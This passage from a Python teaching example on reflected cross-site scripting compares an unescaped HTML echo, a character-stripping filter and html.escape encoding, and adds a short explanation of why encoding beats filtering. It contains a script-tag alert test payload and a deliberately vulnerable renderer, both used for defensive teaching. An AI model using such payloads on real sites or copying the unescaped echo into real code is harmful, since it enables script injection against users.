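    """The 'blindly printing' server: whatever was typed lands in the page as HTML."""
    return f"<p>Hello, {name}!</p>"


def strip_filter(name):
    """Drop the slide's list of characters before echoing."""
    return "".join(ch for ch in name if ch not in FILTERED)


def render_filtered(name):
    return f"<p>Hello, {strip_filter(name)}!</p>"


def render_escaped(name):
    """Encode for the HTML text context instead of deleting characters:
    < > & " ' become entities, so the browser shows them and never executes them."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def reflected_unescaped(render, probe):
    """Regression check: does the probe come back in the page verbatim?"""
    return probe in render(probe)


PAYLOAD = "<script>alert('Gotcha!');</script>"     # the slide's example
LEGIT = "O'Brien & Sons (Ltd) 50%"                 # constructed ordinary input

if __name__ == "__main__":
    for render in (render_unsafe, render_filtered, render_escaped):
        print(render.__name__, "reflects payload:", reflected_unescaped(render, PAYLOAD))
        print("   ", render(LEGIT))
```

Both the filter and the encoder stop the payload from coming back as markup; the difference shows on the legitimate input, which the filter mangles and the encoder preserves.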